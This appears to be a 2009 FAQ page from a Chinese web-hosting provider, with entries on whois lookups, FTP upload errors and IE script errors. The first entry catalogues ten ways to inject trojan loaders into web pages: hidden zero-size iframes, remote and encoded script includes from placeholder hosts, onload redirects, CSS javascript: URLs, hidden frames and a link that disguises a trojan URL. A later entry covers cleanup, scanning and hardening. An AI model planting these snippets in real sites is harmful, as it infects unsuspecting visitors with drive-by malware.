|
|
|
|
|
|
| 常见问题 |
| ◆ [ 技术相关 ] 网页被挂马的10种样式 |
2009-5-27 16:35:35 |
一:框架挂马
[iframe src=地址 width=0 height=0][/iframe]
二:js文件挂马
首先将以下代码
document.write("[iframe width='0' height='0' src='地址'][/iframe]");
保存为xxx.js,
则JS挂马代码为
[script language=javascript src=xxx.js][/script]
三:js变形加密
[SCRIPT language="JScript.Encode" src=http://www.abcdefg.com/muma.txt][/script]
muma.txt可改成任意后缀
四:body挂马
[body onload="window.location='地址';"][/body]
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n[iframe src="http://www.abcdefg.com/muma.htm/"][/iframe]';
六:css中挂马
body {
background-image: url('javascript:document.write("[script src=http://www.abcdefg.net/muma.js][/script]")')}
七:JAJA挂马
[SCRIPT language=javascript]
window.open ("地址","", "toolbar=no,location=no, directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
[/script]
八:图片伪装
[html]
[iframe src="网马地址" height=0 width=0][/iframe]
[img src="图片地址"][/center]
[/html]
九:伪装调用:
[frameset rows="444,0" cols="*"]
[frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"]
[frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"]
[frameset]
十:高级欺骗
[a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"] 页面要显示的内容 [/a]
[SCRIPT Language="JavaScript"]
function www_163_com ()
{
var url="网马地址";
open (url,"NewWindow","toolbar=no,location=no,directories=no, status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes, width=800,height=600,left=10,top=10");
}
[/SCRIPT]
以上[]得用尖括号代替 |
| TOP |
| ◆ [ 常见问题 ] 不知道怎么查域名到期时间怎么办? |
2009-5-24 22:09:42 |
很多用户经常跑过来问我们他的域名什么时候到期,其实这个只要自己找个whois查一下就知道了。 八达网络提供的查询网址是www.3sdc.com/usernew/whois.asp
一月 JAN
二月 FEB
三月 MAR
四月 APR
五月 MAY
六月 JUN
七月 JUL
八月 AUG
九月 SEPT
十月 OCT
十一月 NOV
十二月 DEC
顺带做个小小广告:)
八达网络的国际域名仅需50元,国内顶级域名20元,其它域名也相当超值
而且进出自由,一年365天代为解析 |
| TOP |
| ◆ [ 技术相关 ] 网站被挂马后如何处理? |
2009-5-20 18:53:20 |
1.下载八达网络提供的木马扫描工具www.3sdc.com/down/scanwebshell.rar,解压后上传到网站里面浏览它,默认密码是woai3sdc,通过它清查空间里面存在的木马文件删除它。
2.利用木马文件或者联系八达网络客服,将网页里面的挂码清除干净。
3.网页设计上要注意防范漏洞,提交有过滤,后台有验证,目录要难猜,密码要复杂。如果是CMS或别人开发的源码,要搜索相关补丁打好。
4.与八达网络客服配合,把网站空间权限设置好,只给个别无法猜测到的目录授予写入或修改权限,其余全部只有只有只读权限,有修改和写入权限的目录要去掉可执行权限。
|
| TOP |
| ◆ [ 技术相关 ] 怎样消除IE状态栏上的错误提示? |
2009-5-20 18:38:40 |
有些网站往往在浏览器的状态栏上显示一个惊叹号,点击后提示某某行某某字符某某错误,有时候能借助它发现网页代码里面的错误,有时候却根本查不出问题在哪,却给浏览者带来很大麻烦,怎么消除它呢?很简单。在网页[head][/head]之间加上这么一段就行了:
[SCRIPT LANGUAGE="JavaScript"]
function closeErrors() {
return true;
}
window.onerror=closeErrors;
[/SCRIPT]
以上[]请更换成尖括号 |
| TOP |
| ◆ [ 技术相关 ] 为什么我上传到服务器文件是0字节 |
2007-3-22 19:45:06 |
出现这种情况你首先检查一下是不是自已的空间已满
如果是你可以删除释放一些再试 |
| TOP |
| ◆ [ 常见问题 ] 为什么无法上传,提示连接时找不到服务器 |
2007-3-20 20:07:14 |
| 首先请检查你的域名是否做过域名解析,检测方法,你可以在DOS提示符下输入ping 如果可以ping通的话,则你可以在FTP软件中FTP主机地址处填写您的域名,如果子ping 不通的话,则你需要FTP主机地址处填写你主机的IP地址 |
| TOP |
|
|
|
|
|